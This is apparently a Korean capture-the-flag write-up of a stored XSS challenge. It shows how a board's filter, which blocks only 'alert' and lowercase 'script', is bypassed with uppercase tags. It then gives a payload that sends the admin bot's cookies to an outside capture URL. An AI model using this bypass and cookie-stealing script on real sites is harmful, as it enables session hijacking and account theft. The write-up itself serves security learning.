문제

---

풀이

로그인 후 게시판 글 작성 페이지에서 해당 스크립트가 있는 게시글을 작성한 후 접속해 보면

alert랑 script 부분이 공백으로 필터링 된 걸 볼 수 있다.

어떤 조건일 때 필터링이 되는지 확인해 본 결과 이 페이지는 현재 alert, 소문자 script만 필터링하고 있는 걸 알 수 있었다.

confirm, SCRIPT를 사용해 본 결과

제목 부분과 글 부분 모두 스크립트를 삽입할 수 있었다. 이제 악성 스크립트를 삽입해 쿠키를 탈취해 보자.

공격 코드

<SCRIPT>new Image().src = "https://eo6wq28znszxjxz.m.pipedream.net?cookieData=" + document.cookie</SCRIPT>

악성 스크립트가 포함된 게시글 작성 후 관리자 봇에게 접속을 유도해서 flag를 획득해 보자.

flag를 획득할 수 있다!